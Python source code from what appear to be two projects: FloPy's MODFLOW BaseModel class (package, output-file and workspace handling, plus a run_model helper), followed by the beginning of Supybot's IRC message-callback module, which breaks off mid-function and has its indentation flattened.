self.packagelist.append(p)
def remove_package(self, pname):
"""
Remove a package from this model
Parameters
----------
pname : string
Name of the package, such as 'RIV', 'BAS6', etc.
"""
for i, pp in enumerate(self.packagelist):
if pname.upper() in pp.name:
if self.verbose:
print('removing Package: ', pp.name)
# Remove the package object from the model's packagelist
p = self.packagelist.pop(i)
# Remove the package unit number from the list of package
# units stored with the model
for iu in p.unit_number:
if iu in self.package_units:
self.package_units.remove(iu)
return
raise StopIteration(
'Package name ' + pname + ' not found in Package list')
def __getattr__(self, item):
"""
__getattr__ - syntactic sugar
Parameters
----------
item : str
3 character package name (case insensitive) or "sr" to access
the SpatialReference instance of the ModflowDis object
Returns
-------
sr : SpatialReference instance
pp : Package object
Package object of type :class:`flopy.pakbase.Package`
Note
----
if self.dis is not None, then the spatial reference instance is updated
using self.dis.delr, self.dis.delc, and self.dis.lenuni before being
returned
"""
if item == 'output_packages' or not hasattr(self, 'output_packages'):
raise AttributeError(item)
if item == 'sr':
if self.dis is not None:
return self.dis.sr
else:
return None
if item == 'tr':
if self.dis is not None:
return self.dis.tr
else:
return None
if item == "start_datetime":
if self.dis is not None:
return self.dis.start_datetime
else:
return None
# return self.get_package(item)
# to avoid infinite recursion
if item == "_packagelist" or item == "packagelist":
raise AttributeError(item)
pckg = self.get_package(item)
if pckg is not None or item in self.mfnam_packages:
return pckg
if item == 'modelgrid':
return
raise AttributeError(item)
def get_ext_dict_attr(self, ext_unit_dict=None, unit=None, filetype=None,
pop_key=True):
iu = None
fname = None
if ext_unit_dict is not None:
for key, value in ext_unit_dict.items():
if key == unit:
iu = key
fname = os.path.basename(value.filename)
break
elif value.filetype == filetype:
iu = key
fname = os.path.basename(value.filename)
if pop_key:
self.add_pop_key_list(iu)
break
return iu, fname
def _output_msg(self, i, add=True):
if add:
txt1 = 'Adding'
txt2 = 'to'
else:
txt1 = 'Removing'
txt2 = 'from'
msg = '{} {} '.format(txt1, self.output_fnames[i]) + \
'(unit={}) '.format(self.output_units[i]) + \
'{} the output list.'.format(txt2)
print(msg)
def add_output_file(self, unit, fname=None, extension='cbc',
binflag=True, package=None):
"""
Add an ascii or binary output file for a package
Parameters
----------
unit : int
unit number of external array
fname : str
filename of external array. (default is None)
extension : str
extension to use for the cell-by-cell file. Only used if fname
is None. (default is cbc)
binflag : bool
boolean flag indicating if the output file is a binary file.
Default is True
package : str
string that defines the package the output file is attached to.
Default is None
"""
add_cbc = False
if unit > 0:
add_cbc = True
# determine if the file is in external_units
if abs(unit) in self.external_units:
idx = self.external_units.index(abs(unit))
if fname is None:
fname = os.path.basename(self.external_fnames[idx])
binflag = self.external_binflag[idx]
self.remove_external(unit=abs(unit))
# determine if the unit exists in the output data
if abs(unit) in self.output_units:
add_cbc = False
idx = self.output_units.index(abs(unit))
# determine if binflag has changed
if binflag is not self.output_binflag[idx]:
add_cbc = True
if add_cbc:
self.remove_output(unit=abs(unit))
else:
if package is not None:
self.output_packages[idx].append(package)
if add_cbc:
if fname is None:
fname = self.name + '.' + extension
# check if this file name exists for a different unit number
if fname in self.output_fnames:
idx = self.output_fnames.index(fname)
iut = self.output_units[idx]
if iut != unit:
# include unit number in fname if package has
# not been passed
if package is None:
fname = self.name + '.{}.'.format(unit) \
+ extension
# include package name in fname
else:
fname = self.name + '.{}.'.format(package) \
+ extension
else:
fname = os.path.basename(fname)
self.add_output(fname, unit, binflag=binflag, package=package)
return
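    # Example (editor's sketch, not part of the original source): attach a binary
    # cell-by-cell budget file on unit 53 for a hypothetical LPF package:
    #
    #     >>> m.add_output_file(53, extension='cbc', binflag=True, package='LPF')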
def add_output(self, fname, unit, binflag=False, package=None):
"""
Assign an external array so that it will be listed as a DATA or
DATA(BINARY) entry in the name file. This will allow an outside
file package to refer to it.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
binflag : boolean
binary or not. (default is False)
"""
if fname in self.output_fnames:
if self.verbose:
msg = "BaseModel.add_output() warning: " + \
"replacing existing filename {}".format(fname)
print(msg)
idx = self.output_fnames.index(fname)
if self.verbose:
self._output_msg(idx, add=False)
self.output_fnames.pop(idx)
self.output_units.pop(idx)
self.output_binflag.pop(idx)
self.output_packages.pop(idx)
self.output_fnames.append(fname)
self.output_units.append(unit)
self.output_binflag.append(binflag)
if package is not None:
self.output_packages.append([package])
else:
self.output_packages.append([])
if self.verbose:
self._output_msg(-1, add=True)
return
def remove_output(self, fname=None, unit=None):
"""
Remove an output file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
if self.verbose:
self._output_msg(i, add=False)
self.output_fnames.pop(i)
self.output_units.pop(i)
self.output_binflag.pop(i)
self.output_packages.pop(i)
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
if self.verbose:
self._output_msg(i, add=False)
self.output_fnames.pop(i)
self.output_units.pop(i)
self.output_binflag.pop(i)
self.output_packages.pop(i)
else:
msg = ' either fname or unit must be passed to remove_output()'
raise Exception(msg)
return
def get_output(self, fname=None, unit=None):
"""
Get an output file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
return self.output_units[i]
return None
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
return self.output_fnames[i]
return None
else:
msg = ' either fname or unit must be passed to get_output()'
raise Exception(msg)
return
def set_output_attribute(self, fname=None, unit=None, attr=None):
"""
Set a variable in an output file from the model by specifying either
the file name or the unit number and a dictionary with attributes
to change.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
idx = None
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
idx = i
break
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
idx = i
break
else:
msg = ' either fname or unit must be passed ' + \
' to set_output_attribute()'
raise Exception(msg)
if attr is not None:
if idx is not None:
                for key, value in attr.items():
if key == 'binflag':
self.output_binflag[idx] = value
elif key == 'fname':
self.output_fnames[idx] = value
elif key == 'unit':
self.output_units[idx] = value
return
def get_output_attribute(self, fname=None, unit=None, attr=None):
"""
Get a attribute for an output file from the model by specifying either
the file name or the unit number.
Parameters
----------
fname : str
filename of output array
unit : int
unit number of output array
"""
idx = None
if fname is not None:
for i, e in enumerate(self.output_fnames):
if fname in e:
idx = i
break
elif unit is not None:
for i, u in enumerate(self.output_units):
if u == unit:
idx = i
break
else:
            raise Exception(
                ' either fname or unit must be passed ' +
                ' to get_output_attribute()')
v = None
if attr is not None:
if idx is not None:
if attr == 'binflag':
v = self.output_binflag[idx]
elif attr == 'fname':
v = self.output_fnames[idx]
elif attr == 'unit':
v = self.output_units[idx]
return v
def add_external(self, fname, unit, binflag=False, output=False):
"""
Assign an external array so that it will be listed as a DATA or
DATA(BINARY) entry in the name file. This will allow an outside
file package to refer to it.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
binflag : boolean
binary or not. (default is False)
"""
if fname in self.external_fnames:
if self.verbose:
msg = "BaseModel.add_external() warning: " + \
"replacing existing filename {}".format(fname)
print(msg)
idx = self.external_fnames.index(fname)
self.external_fnames.pop(idx)
self.external_units.pop(idx)
self.external_binflag.pop(idx)
self.external_output.pop(idx)
if unit in self.external_units:
if self.verbose:
msg = "BaseModel.add_external() warning: " + \
"replacing existing unit {}".format(unit)
print(msg)
idx = self.external_units.index(unit)
self.external_fnames.pop(idx)
self.external_units.pop(idx)
self.external_binflag.pop(idx)
self.external_output.pop(idx)
self.external_fnames.append(fname)
self.external_units.append(unit)
self.external_binflag.append(binflag)
self.external_output.append(output)
return
def remove_external(self, fname=None, unit=None):
"""
Remove an external file from the model by specifying either the
file name or the unit number.
Parameters
----------
fname : str
filename of external array
unit : int
unit number of external array
"""
plist = []
if fname is not None:
for i, e in enumerate(self.external_fnames):
if fname in e:
plist.append(i)
elif unit is not None:
for i, u in enumerate(self.external_units):
if u == unit:
plist.append(i)
else:
msg = ' either fname or unit must be passed to remove_external()'
raise Exception(msg)
# remove external file
j = 0
for i in plist:
ipos = i - j
self.external_fnames.pop(ipos)
self.external_units.pop(ipos)
self.external_binflag.pop(ipos)
self.external_output.pop(ipos)
j += 1
return
def add_existing_package(self, filename, ptype=None,
copy_to_model_ws=True):
"""
Add an existing package to a model instance.
Parameters
----------
filename : str
the name of the file to add as a package
ptype : optional
the model package type (e.g. "lpf", "wel", etc). If None,
then the file extension of the filename arg is used
copy_to_model_ws : bool
flag to copy the package file into the model_ws directory.
Returns
-------
None
"""
if ptype is None:
ptype = filename.split('.')[-1]
ptype = str(ptype).upper()
# for pak in self.packagelist:
# if ptype in pak.name:
# print("BaseModel.add_existing_package() warning: " +\
# "replacing existing package {0}".format(ptype))
class Obj(object):
pass
fake_package = Obj()
fake_package.write_file = lambda: None
fake_package.extra = ['']
fake_package.name = [ptype]
fake_package.extension = [filename.split('.')[-1]]
fake_package.unit_number = [self.next_ext_unit()]
if copy_to_model_ws:
base_filename = os.path.split(filename)[-1]
fake_package.file_name = [base_filename]
shutil.copy2(filename, os.path.join(self.model_ws, base_filename))
else:
fake_package.file_name = [filename]
fake_package.allowDuplicates = True
self.add_package(fake_package)
def get_name_file_entries(self):
"""
Get a string representation of the name file.
Parameters
----------
"""
lines = []
for p in self.packagelist:
for i in range(len(p.name)):
if p.unit_number[i] == 0:
continue
s = '{:14s} '.format(p.name[i]) + \
'{:5d} '.format(p.unit_number[i]) + \
'{}'.format(p.file_name[i])
if p.extra[i]:
s += ' ' + p.extra[i]
lines.append(s)
return '\n'.join(lines) + '\n'
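    # Editor's note (sketch, not part of the original source): each returned line
    # has the form "<package name>  <unit number>  <file name> [extra]", e.g.
    # something like "LPF            15 modflowtest.lpf" for a hypothetical LPF
    # package on unit 15.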
def has_package(self, name):
"""
Check if package name is in package list.
Parameters
----------
name : str
Name of the package, 'DIS', 'BAS6', etc. (case-insensitive).
Returns
-------
bool
True if package name exists, otherwise False if not found.
"""
if not name:
raise ValueError('invalid package name')
name = name.upper()
for p in self.packagelist:
for pn in p.name:
if pn.upper() == name:
return True
return False
def get_package(self, name):
"""
Get a package.
Parameters
----------
name : str
Name of the package, 'RIV', 'LPF', etc. (case-insensitive).
Returns
-------
pp : Package object
Package object of type :class:`flopy.pakbase.Package`
"""
if not name:
raise ValueError('invalid package name')
name = name.upper()
for pp in (self.packagelist):
if pp.name[0].upper() == name:
return pp
return None
def set_version(self, version):
self.version = version.lower()
# check that this is a valid model version
if self.version not in list(self.version_types.keys()):
err = 'Error: Unsupported model ' + \
'version ({}).'.format(self.version) + \
' Valid model versions are:'
for v in list(self.version_types.keys()):
err += ' {}'.format(v)
raise Exception(err)
# set namefile heading
heading = '# Name file for ' + \
'{}, '.format(self.version_types[self.version]) + \
'generated by Flopy version {}.'.format(__version__)
self.heading = heading
# set heading for each package
for p in self.get_package_list():
pak = self.get_package(p)
heading = '# {} package for '.format(pak.name[0]) + \
'{}, '.format(self.version_types[self.version]) + \
'generated by Flopy version {}.'.format(__version__)
pak.heading = heading
return None
def change_model_ws(self, new_pth=None, reset_external=False):
"""
Change the model work space.
Parameters
----------
new_pth : str
Location of new model workspace. If this path does not exist,
it will be created. (default is None, which will be assigned to
the present working directory).
Returns
-------
val : list of strings
Can be used to see what packages are in the model, and can then
be used with get_package to pull out individual packages.
"""
if new_pth is None:
new_pth = os.getcwd()
if not os.path.exists(new_pth):
try:
line = '\ncreating model workspace...\n' + \
' {}'.format(new_pth)
print(line)
os.makedirs(new_pth)
except:
line = '\n{} not valid, workspace-folder '.format(new_pth)
raise OSError(line)
# line = '\n{} not valid, workspace-folder '.format(new_pth) + \
# 'was changed to {}\n'.format(os.getcwd())
# print(line)
# new_pth = os.getcwd()
# --reset the model workspace
old_pth = self._model_ws
self._model_ws = new_pth
line = '\nchanging model workspace...\n {}\n'.format(new_pth)
sys.stdout.write(line)
# reset the paths for each package
for pp in (self.packagelist):
pp.fn_path = os.path.join(self.model_ws, pp.file_name[0])
# create the external path (if needed)
if hasattr(self, "external_path") and self.external_path is not None \
and not os.path.exists(os.path.join(self._model_ws,
self.external_path)):
pth = os.path.join(self._model_ws, self.external_path)
os.makedirs(pth)
if reset_external:
self._reset_external(pth, old_pth)
elif reset_external:
self._reset_external(self._model_ws, old_pth)
return None
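    # Example (editor's sketch, not part of the original source): move the model
    # to a new workspace and recompute relative paths for external input files:
    #
    #     >>> m.change_model_ws('./scenario_1', reset_external=True)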
def _reset_external(self, pth, old_pth):
new_ext_fnames = []
for ext_file, output in zip(self.external_fnames,
self.external_output):
# new_ext_file = os.path.join(pth, os.path.split(ext_file)[-1])
# this is a wicked mess
if output:
# new_ext_file = os.path.join(pth, os.path.split(ext_file)[-1])
new_ext_file = ext_file
else:
# fpth = os.path.abspath(os.path.join(old_pth, ext_file))
# new_ext_file = os.path.relpath(fpth, os.path.abspath(pth))
fdir = os.path.dirname(ext_file)
if fdir == '':
fpth = os.path.abspath(os.path.join(old_pth, ext_file))
else:
fpth = ext_file
ao = os.path.abspath(os.path.dirname(fpth))
ep = os.path.abspath(pth)
relp = os.path.relpath(ao, ep)
new_ext_file = os.path.join(relp, os.path.basename(ext_file))
new_ext_fnames.append(new_ext_file)
self.external_fnames = new_ext_fnames
@property
def model_ws(self):
return copy.deepcopy(self._model_ws)
def _set_name(self, value):
"""
Set model name
Parameters
----------
value : str
Name to assign to model.
"""
self.__name = str(value)
self.namefile = self.__name + '.' + self.namefile_ext
for p in self.packagelist:
for i in range(len(p.extension)):
p.file_name[i] = self.__name + '.' + p.extension[i]
p.fn_path = os.path.join(self.model_ws, p.file_name[0])
def __setattr__(self, key, value):
if key == "free_format_input":
# if self.bas6 is not None:
# self.bas6.ifrefm = value
super(BaseModel, self).__setattr__(key, value)
elif key == "name":
self._set_name(value)
elif key == "model_ws":
self.change_model_ws(value)
elif key == "sr":
assert isinstance(value, utils.reference.SpatialReference)
warnings.warn(
"SpatialReference has been deprecated.",
category=DeprecationWarning)
if self.dis is not None:
self.dis.sr = value
else:
raise Exception("cannot set SpatialReference -"
"ModflowDis not found")
elif key == "tr":
assert isinstance(value,
discretization.reference.TemporalReference)
if self.dis is not None:
self.dis.tr = value
else:
raise Exception("cannot set TemporalReference -"
"ModflowDis not found")
elif key == "start_datetime":
if self.dis is not None:
self.dis.start_datetime = value
self.tr.start_datetime = value
else:
raise Exception("cannot set start_datetime -"
"ModflowDis not found")
else:
super(BaseModel, self).__setattr__(key, value)
def run_model(self, silent=False, pause=False, report=False,
normal_msg='normal termination'):
"""
This method will run the model using subprocess.Popen.
Parameters
----------
        silent : boolean
            If True, suppress echo of run information to the screen.
            (default is False)
pause : boolean, optional
Pause upon completion (default is False).
report : boolean, optional
Save stdout lines to a list (buff) which is returned
by the method . (default is False).
normal_msg : str
Normal termination message used to determine if the
run terminated normally. (default is 'normal termination')
Returns
-------
(success, buff)
success : boolean
buff : list of lines of stdout
"""
return run_model(self.exe_name, self.namefile, model_ws=self.model_ws,
silent=silent, pause=pause, report=report,
normal_msg=normal_msg)
def load_results(self):
print('load_results not implemented')
return None
def write_input(self, SelPackList=False, check=False):
"""
Write the input.
Parameters
----------
SelPackList : False or list of packages
"""
if check:
# run check prior to writing input
self.check(f='{}.chk'.format(self.name), verbose=self.verbose,
level=1)
# reset the model to free_format if parameter substitution was
# performed on a model load
if self.parameter_load and not self.free_format_input:
if self.verbose:
print('\nResetting free_format_input to True to ' +
'preserve the precision of the parameter data.')
self.free_format_input = True
if self.verbose:
print('\nWriting packages:')
if SelPackList == False:
for p in self.packagelist:
if self.verbose:
print(' Package: ', p.name[0])
# prevent individual package checks from running after
# model-level package check above
# otherwise checks are run twice
# or the model level check procedure would have to be split up
# or each package would need a check argument,
# or default for package level check would have to be False
try:
p.write_file(check=False)
except TypeError:
p.write_file()
else:
for pon in SelPackList:
for i, p in enumerate(self.packagelist):
if pon in p.name:
if self.verbose:
print(' Package: ', p.name[0])
try:
p.write_file(check=False)
except TypeError:
p.write_file()
break
if self.verbose:
print(' ')
# write name file
self.write_name_file()
# os.chdir(org_dir)
return
def write_name_file(self):
"""
        Every model needs its own write_name_file method
"""
raise Exception(
            'IMPLEMENTATION ERROR: write_name_file must be overloaded')
def set_model_units(self):
"""
Every model needs its own set_model_units method
"""
raise Exception(
'IMPLEMENTATION ERROR: set_model_units must be overloaded')
@property
def name(self):
"""
Get model name
Returns
-------
name : str
name of model
"""
return copy.deepcopy(self.__name)
def add_pop_key_list(self, key):
"""
Add a external file unit number to a list that will be used to remove
model output (typically binary) files from ext_unit_dict.
Parameters
----------
key : int
file unit number
Returns
-------
Examples
--------
"""
if key not in self.pop_key_list:
self.pop_key_list.append(key)
def check(self, f=None, verbose=True, level=1):
"""
Check model data for common errors.
Parameters
----------
f : str or file handle
String defining file name or file handle for summary file
of check method output. If a string is passed a file handle
is created. If f is None, check method does not write
results to a summary file. (default is None)
verbose : bool
Boolean flag used to determine if check method results are
written to the screen
level : int
Check method analysis level. If level=0, summary checks are
performed. If level=1, full checks are performed.
Returns
-------
None
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow.load('model.nam')
>>> m.check()
"""
# check instance for model-level check
chk = utils.check(self, f=f, verbose=verbose, level=level)
# check for unit number conflicts
package_units = {}
duplicate_units = {}
for p in self.packagelist:
for i in range(len(p.name)):
if p.unit_number[i] != 0:
if p.unit_number[i] in package_units.values():
duplicate_units[p.name[i]] = p.unit_number[i]
otherpackage = [k for k, v in package_units.items()
if v == p.unit_number[i]][0]
duplicate_units[otherpackage] = p.unit_number[i]
if len(duplicate_units) > 0:
for k, v in duplicate_units.items():
chk._add_to_summary('Error', package=k, value=v,
desc='unit number conflict')
else:
chk.passed.append('Unit number conflicts')
return self._check(chk, level)
def plot(self, SelPackList=None, **kwargs):
"""
Plot 2-D, 3-D, transient 2-D, and stress period list (MfList)
model input data
Parameters
----------
        SelPackList : bool or list
            List of packages to plot. If SelPackList=None all packages
            are plotted. (default is None)
**kwargs : dict
filename_base : str
Base file name that will be used to automatically generate file
names for output image files. Plots will be exported as image
files if file_name_base is not None. (default is None)
file_extension : str
Valid matplotlib.pyplot file extension for savefig(). Only used
if filename_base is not None. (default is 'png')
mflay : int
                MODFLOW zero-based layer number to return. If None, then
                all layers will be included. (default is None)
kper : int
MODFLOW zero-based stress period number to return.
(default is zero)
key : str
MfList dictionary key. (default is None)
Returns
----------
axes : list
Empty list is returned if filename_base is not None. Otherwise
a list of matplotlib.pyplot.axis are returned.
See Also
--------
Notes
-----
Examples
--------
>>> import flopy
>>> ml = flopy.modflow.Modflow.load('test.nam')
>>> ml.plot()
"""
from flopy.plot import PlotUtilities
axes = PlotUtilities._plot_model_helper(self, SelPackList=SelPackList,
**kwargs)
return axes
def to_shapefile(self, filename, package_names=None, **kwargs):
"""
Wrapper function for writing a shapefile for the model grid. If
package_names is not None, then search through the requested packages
looking for arrays that can be added to the shapefile as attributes
Parameters
----------
filename : string
name of the shapefile to write
package_names : list of package names (e.g. ["dis","lpf"])
Packages to export data arrays to shapefile. (default is None)
Returns
-------
None
Examples
--------
>>> import flopy
>>> m = flopy.modflow.Modflow()
>>> m.to_shapefile('model.shp', SelPackList)
"""
warnings.warn("to_shapefile() is deprecated. use .export()")
self.export(filename, package_names=package_names)
return
def run_model(exe_name, namefile, model_ws='./',
silent=False, pause=False, report=False,
normal_msg='normal termination', use_async=False,
cargs=None):
"""
This function will run the model using subprocess.Popen. It
communicates with the model's stdout asynchronously and reports
progress to the screen with timestamps
Parameters
----------
exe_name : str
Executable name (with path, if necessary) to run.
namefile : str
Namefile of model to run. The namefile must be the
filename of the namefile without the path. Namefile can be None
to allow programs that do not require a control file (name file)
to be passed as a command line argument.
model_ws : str
Path to the location of the namefile. (default is the
current working directory - './')
    silent : boolean
        If True, suppress echo of run information to the screen.
        (default is False)
pause : boolean, optional
Pause upon completion (default is False).
report : boolean, optional
Save stdout lines to a list (buff) which is returned
by the method . (default is False).
normal_msg : str or list
Normal termination message used to determine if the
run terminated normally. More than one message can be provided using
a list. (Default is 'normal termination')
    use_async : boolean
        Asynchronously read model stdout and report with timestamps. Good
        for models that take a long time to run; not recommended for models
        that run very quickly.
cargs : str or list of strings
additional command line arguments to pass to the executable.
Default is None
Returns
-------
(success, buff)
success : boolean
buff : list of lines of stdout
"""
success = False
buff = []
# convert normal_msg to a list of lower case str for comparison
if isinstance(normal_msg, str):
normal_msg = [normal_msg]
for idx, s in enumerate(normal_msg):
normal_msg[idx] = s.lower()
# Check to make sure that program and namefile exist
exe = which(exe_name)
if exe is None:
import platform
        if platform.system() == 'Windows':
if not exe_name.lower().endswith('.exe'):
exe = which(exe_name + '.exe')
if exe is None:
s = 'The program {} does not exist or is not executable.'.format(
exe_name)
raise Exception(s)
else:
if not silent:
            s = 'FloPy is using the following ' + \
                'executable to run the model: {}'.format(exe)
print(s)
if namefile is not None:
if not os.path.isfile(os.path.join(model_ws, namefile)):
            s = 'The namefile for this model ' + \
                'does not exist: {}'.format(namefile)
raise Exception(s)
# simple little function for the thread to target
def q_output(output, q):
for line in iter(output.readline, b''):
q.put(line)
# time.sleep(1)
# output.close()
# create a list of arguments to pass to Popen
argv = [exe_name]
if namefile is not None:
argv.append(namefile)
# add additional arguments to Popen arguments
if cargs is not None:
if isinstance(cargs, str):
cargs = [cargs]
for t in cargs:
argv.append(t)
# run the model with Popen
proc = Popen(argv, stdout=PIPE, stderr=STDOUT, cwd=model_ws)
if not use_async:
while True:
line = proc.stdout.readline().decode('utf-8')
if line == '' and proc.poll() is not None:
break
if line:
for msg in normal_msg:
if msg in line.lower():
success = True
break
line = line.rstrip('\r\n')
if not silent:
print(line)
if report:
buff.append(line)
else:
break
return success, buff
# some tricks for the async stdout reading
q = Queue.Queue()
thread = threading.Thread(target=q_output, args=(proc.stdout, q))
thread.daemon = True
thread.start()
failed_words = ["fail", "error"]
last = datetime.now()
lastsec = 0.
while True:
try:
line = q.get_nowait()
except Queue.Empty:
pass
else:
if line == '':
break
line = line.decode().lower().strip()
if line != '':
now = datetime.now()
dt = now - last
tsecs = dt.total_seconds() - lastsec
line = "(elapsed:{0})-->{1}".format(tsecs, line)
lastsec = tsecs + lastsec
buff.append(line)
if not silent:
print(line)
for fword in failed_words:
if fword in line:
success = False
break
if proc.poll() is not None:
break
proc.wait()
thread.join(timeout=1)
buff.extend(proc.stdout.readlines())
proc.stdout.close()
for line in buff:
for msg in normal_msg:
if msg in line.lower():
print("success")
success = True
break
if pause:
input('Press Enter to continue...')
return success, buff
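# Example (editor's sketch, not part of the original source): run a model whose
# name file is "model.nam" in "./model_dir", assuming an "mf2005" executable is
# available on the system PATH, and capture its stdout:
#
#     success, buff = run_model('mf2005', 'model.nam', model_ws='./model_dir',
#                               silent=True, report=True)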
|
callbacks.py
|
# -*- coding: utf8 -*-
###
# Copyright (c) 2002-2005, Jeremiah Fincher
# Copyright (c) 2014, James McCoy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
This module contains the basic callbacks for handling PRIVMSGs.
"""
import re
import copy
import time
from . import shlex
import codecs
import getopt
import inspect
import warnings
from . import (conf, ircdb, irclib, ircmsgs, ircutils, log, registry,
utils, world)
from .utils import minisix
from .utils.iter import any, all
from .i18n import PluginInternationalization
_ = PluginInternationalization()
def _addressed(nick, msg, prefixChars=None, nicks=None,
prefixStrings=None, whenAddressedByNick=None,
whenAddressedByNickAtEnd=None):
def get(group):
if ircutils.isChannel(target):
group = group.get(target)
return group()
def stripPrefixStrings(payload):
for prefixString in prefixStrings:
if payload.startswith(prefixString):
payload = payload[len(prefixString):].lstrip()
return payload
assert msg.command == 'PRIVMSG'
(target, payload) = msg.args
if not payload:
return ''
if prefixChars is None:
prefixChars = get(conf.supybot.reply.whenAddressedBy.chars)
if whenAddressedByNick is None:
whenAddressedByNick = get(conf.supybot.reply.whenAddressedBy.nick)
if whenAddressedByNickAtEnd is None:
r = conf.supybot.reply.whenAddressedBy.nick.atEnd
whenAddressedByNickAtEnd = get(r)
if prefixStrings is None:
prefixStrings = get(conf.supybot.reply.whenAddressedBy.strings)
# We have to check this before nicks -- try "@google supybot" with supybot
# and whenAddressedBy.nick.atEnd on to see why.
if any(payload.startswith, prefixStrings):
return stripPrefixStrings(payload)
elif payload[0] in prefixChars:
return payload[1:].strip()
if nicks is None:
nicks = get(conf.supybot.reply.whenAddressedBy.nicks)
nicks = list(map(ircutils.toLower, nicks))
else:
nicks = list(nicks) # Just in case.
nicks.insert(0, ircutils.toLower(nick))
# Ok, let's see if it's a private message.
if ircutils.nickEqual(target, nick):
payload = stripPrefixStrings(payload)
while payload and payload[0] in prefixChars:
payload = payload[1:].lstrip()
return payload
# Ok, not private. Does it start with our nick?
elif whenAddressedByNick:
for nick in nicks:
lowered = ircutils.toLower(payload)
if lowered.startswith(nick):
try:
(maybeNick, rest) = payload.split(None, 1)
toContinue = False
while not ircutils.isNick(maybeNick, strictRfc=True):
if maybeNick[-1].isalnum():
toContinue = True
break
maybeNick = maybeNick[:-1]
if toContinue:
continue
if ircutils.nickEqual(maybeNick, nick):
return rest
else:
continue
except ValueError: # split didn't work.
continue
elif whenAddressedByNickAtEnd and lowered.endswith(nick):
rest = payload[:-len(nick)]
possiblePayload = rest.rstrip(' \t,;')
if possiblePayload != rest:
# There should be some separator between the nick and the
# previous alphanumeric character.
return possiblePayload
if get(conf.supybot.reply.whenNotAddressed):
return payload
else:
return ''
def addressed(nick, msg, **kwargs):
"""If msg is addressed to 'name', returns the portion after the address.
Otherwise returns the empty string.
"""
payload = msg.addressed
if payload is not None:
return payload
else:
payload = _addressed(nick, msg, **kwargs)
msg.tag('addressed', payload)
return payload
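# Editor's note (sketch, not part of the original source): with nick "mybot", a
# configured prefix character "@" and default settings, _addressed() above would
# treat all of the following PRIVMSG payloads as addressed and return the
# command portion shown:
#
#     "@echo hi"        -> "echo hi"   (prefix character)
#     "mybot: echo hi"  -> "echo hi"   (addressed by nick)
#     "echo hi"         -> "echo hi"   (only when sent in a private message)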
def canonicalName(command, preserve_spaces=False):
"""Turn a command into its canonical form.
Currently, this makes everything lowercase and removes all dashes and
underscores.
"""
if minisix.PY2 and isinstance(command, unicode):
command = command.encode('utf-8')
elif minisix.PY3 and isinstance(command, bytes):
command = command.decode()
special = '\t-_'
if not preserve_spaces:
special += ' '
reAppend = ''
while command and command[-1] in special:
reAppend = command[-1] + reAppend
command = command[:-1]
return ''.join([x for x in command if x not in special]).lower() + reAppend
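# A few illustrative calls (assumed, not from the original docs) showing how
# canonicalName() lowercases and strips '-', '_', and tab (and spaces unless
# preserve_spaces=True), while re-appending trailing special characters:
#
#   canonicalName('Foo-Bar_baz')       # -> 'foobarbaz'
#   canonicalName('list_')             # -> 'list_' (trailing '_' preserved)
#   canonicalName('foo bar', True)     # -> 'foo bar'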
def reply(*args, **kwargs):
warnings.warn('callbacks.reply is deprecated. Use irc.reply instead.',
DeprecationWarning)
return _makeReply(dynamic.irc, *args, **kwargs)
def _makeReply(irc, msg, s,
prefixNick=None, private=None,
notice=None, to=None, action=None, error=False,
stripCtcp=True):
msg.tag('repliedTo')
# Ok, let's make the target:
# XXX This isn't entirely right. Consider to=#foo, private=True.
target = ircutils.replyTo(msg)
def isPublic(s):
return irc.isChannel(irc.stripChannelPrefix(s))
if to is not None and isPublic(to):
target = to
if isPublic(target):
channel = irc.stripChannelPrefix(target)
else:
channel = None
if notice is None:
notice = conf.get(conf.supybot.reply.withNotice,
channel=channel, network=irc.network)
if private is None:
private = conf.get(conf.supybot.reply.inPrivate,
channel=channel, network=irc.network)
if prefixNick is None:
prefixNick = conf.get(conf.supybot.reply.withNickPrefix,
channel=channel, network=irc.network)
if error:
        notice = conf.get(conf.supybot.reply.error.withNotice,
                          channel=channel, network=irc.network) or notice
        private = conf.get(conf.supybot.reply.error.inPrivate,
                           channel=channel, network=irc.network) or private
s = _('Error: ') + s
if private:
prefixNick = False
if to is None:
target = msg.nick
else:
target = to
if action:
prefixNick = False
if to is None:
to = msg.nick
if stripCtcp:
s = s.strip('\x01')
# Ok, now let's make the payload:
s = ircutils.safeArgument(s)
if not s and not action:
s = _('Error: I tried to send you an empty message.')
if prefixNick and isPublic(target):
        # Let's make sure we don't do, "#channel: foo.".
